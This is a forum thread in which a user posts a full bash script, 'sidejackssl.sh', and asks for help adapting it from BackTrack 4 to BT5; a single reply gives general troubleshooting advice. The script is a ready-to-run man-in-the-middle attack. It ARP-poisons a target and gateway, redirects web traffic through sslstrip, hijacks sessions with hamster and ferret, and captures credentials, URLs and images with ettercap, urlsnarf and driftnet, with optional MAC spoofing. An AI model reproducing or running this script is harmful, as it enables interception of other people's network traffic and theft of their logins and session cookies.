Jump to content

Help Fix The Script For Bt5 !


Glynec
 Share

Recommended Posts

#!/bin/bash

# sidejackssl.sh v0.2
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# driftnet for fun
# firefox needs to be configured with a proxy of 127.0.0.1:1234
# url for hamster server is http://hamster
# by gorara

# a few variables (do not change)
m1="0"					# missing file var m1
m2="0"					# missing file var m2
m3="0"					# missing file var m3
m4="0"					# missing file var m4
quickclean="0"				# used for quick clean up
randmac="n"				# default setting do not randomize MAC
hamsterfile="hamster.txt"		# hamster output file (you can't change it)
trap 'cleanup' SIGINT SIGTERM		# detect control-c

# a few more variables (change these if required)

# xterm window variables
x="0"					# x offset value
y="0"					# y offset value
width="120"				# width value
height="7"				# height value
yoffset="120"				# y offset
fgcolor="white"				# foreground color
bgcolor="black"				# background color

# style variables
warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
inputstyle="[\e[01;30m?\e[00m]"		# input msgs style

# file variables
sslstripfile="sslstrip.log"		# sslstrip output file name
snifffile="sniff-*"			# hamster sniff file wildcard
etterfile="etter.cap"			# ettercap output cap file
temp="/tmp"				# temporary dir

function usage
{
	clear
	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
	echo ""
	echo "	-i interface	interface to use, ex. eth0, wlan0."
	echo "	-t target	the target IP address."
	echo "	-g gateway	the gateway IP address."
	echo "	-r		randomize your MAC address,"
	echo "			only use for wired interfaces."
	echo "	-h		display this help screen."
	echo ""
	echo "	examples: "
	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
	echo ""
	exit 0
}

function cleanup() {
echo -e "\n$warnstyle control-c pressed! "

# exit script if nothing has been modified
if [[ "$quickclean" = "1" ]]; then
echo -e "$infostyle nothing changed, all done!"
exit 0
fi

echo -e "$infostyle cleaning up..."
echo -e "$execstyle flushing iptables..."
iptables -F
iptables -t nat -F

echo -e "$execstyle turning off IP forwarding..."
echo "0" > /proc/sys/net/ipv4/ip_forward

# change back MAC address to orignal one
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle resetting MAC address...";
echo -e "$infostyle original MAC is: $origmac"
ifconfig $interface down
ifconfig $interface hw ether $origmac
ifconfig $interface up
	if [ -z $gw ]; then
	echo -e "$warnstyle WARNING, you have no default gateway!"
	else
	route add default gw $gw
	fi
rm $temp/mac.orig
rm $temp/gw.orig
fi

echo -e "$execstyle cleaning up files..."
echo -e "$infostyle temp directory: "

# testing to see if files exist, if so display them...
	if [ -f $temp/$sslstripfile ]; then
	ls $temp/$sslstripfile
	else
	#echo -e "$warnstyle missing $sslstripfile"
	m1="1"
	fi

	if [ -f $temp/$etterfile ]; then
	ls $temp/$etterfile
	else
	#echo -e "$warnstyle missing $etterfile"
	m2="1"
	fi

echo -e "$infostyle current directory: "

	if [ -f $snifffile ]; then
	ls $snifffile
	else
	#echo -e "$warnstyle missing $snifffile"
	m3="1"
	fi

	if [ -f $hamsterfile ]; then
	ls $hamsterfile
	else
	#echo -e "$warnstyle missing $hamsterfile"
	m4="1"
	fi

# testing to see if there are any files at all
if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then

while [[ "$delete" != "y" || "$delete" != "n" ]]

echo -en "$infostyle delete file(s)? [y/n]: " 
read delete

do
    case "$delete" in
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
	n) echo -e "$warnstyle nothing deleted!"; break;;
    	*) echo -e "$warnstyle wrong selection!";
    esac
done

# delete files as requested
if [[ "$delete_marker" = "y" ]]; then
	if [ -f $temp/$sslstripfile ]; then
	rm $temp/$sslstripfile
	fi

	if [ -f $temp/$etterfile ]; then
	rm $temp/$etterfile
	fi

	if [ -f $snifffile ]; then
	rm $snifffile
	fi

	if [ -f $hamsterfile ]; then
	rm $hamsterfile
	fi
fi

else

	echo -e "$warnstyle nothing to delete!"
fi

echo -e "$infostyle all done!"
exit 0
}


# start main program
if [ "$#" -eq 0 ]; then
usage
fi

while [ "$#" -gt 0 ]
do
    case "$1" in
        -i)  interface=$2; shift 1;;
	-r)  randmac="y"; shift 1;;
	-t)  target=$2; shift 1;;
	-g)  gateway=$2; shift 1;;
	-h)  usage;;
	-*)  usage; break;;
	*)  break;;
    esac
    shift
done

# required parameters
if [[ -z $interface || -z $target || -z $gateway ]]; then
usage
exit 0
fi

clear

if [[ "$randmac" = "y" ]]; then
mac="yes"
else
mac="no"
fi

# set quick cleanup flag
quickclean="1"

echo -e "$infostyle sidejacker/sslstrip script v0.2, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"

if [[ "$randmac" = "y" ]]; then 

echo -e "$execstyle change of $interface MAC address requested."

if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
echo -e "$infostyle wireless device detected..." 
echo -e "$warnstyle can't change MAC address without taking wifi interface down"
echo -e "$warnstyle do it manually before connecting to the AP."
exit 0
fi

if [[ "$interface" = eth* ]]; then
echo -e "$infostyle wired device detected..." 
echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
echo -en "$inputstyle do you want to continue? [y/n]: "
read continue
	if [[ "$continue" = "y" ]]; then
	echo -e "$infostyle proceeding..."
	else
	echo -e "$infostyle exiting..."
	exit 0	
	fi
fi

origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`

fi

# before this, ctrl-c will exit script without doing anything.
quickclean="0"

# use macchanger to randomize MAC address, ect.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
echo -e "$execstyle randomizing MAC address...";
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
ifconfig $interface down
macchanger -r $interface > $temp/mac.orig
ifconfig $interface up
	if [ -z $gw ]; then
	echo -e "$warnstyle WARNING, you have no default gateway!"
	else
	route add default gw $gw
	fi
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
echo -e "$infostyle original MAC is: $origmac"
echo -e "$infostyle faked    MAC is: $fakemac"
fi

echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward

echo -e "$execstyle configuring iptables..."
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sleep 1

echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2

echo -e "$execstyle starting ferret   ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2

echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -a -k -f -w $temp/$sslstripfile &
sleep 2

echo -e "$execstyle starting ettercap ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface &
sleep 2

echo -e "$execstyle starting urlsnarf ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2

echo -e "$execstyle starting driftnet ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "driftnet" -e driftnet -p -i $interface &
sleep 2

echo -e "$infostyle trap is ready, now to direct traffic..."

echo -e "$execstyle ARP poisoning the target..."
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1

echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
for ((;;)) do 
read loop
echo -en "$infostyle press ctrl-c to terminate!"
done

exit 0

Powered by bt4 - does not work on bt5 (((

Link to comment
Share on other sites

Have you bothered to check if any of the files needed are installed and working in BT5? What kind of errors do you get when trying to run it? Also, while this is a forum where people use backtrack, have you bothered to look on the official backtrack forums for help. Might be better to post it there, than here.

http://www.backtrack-linux.org/forums/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...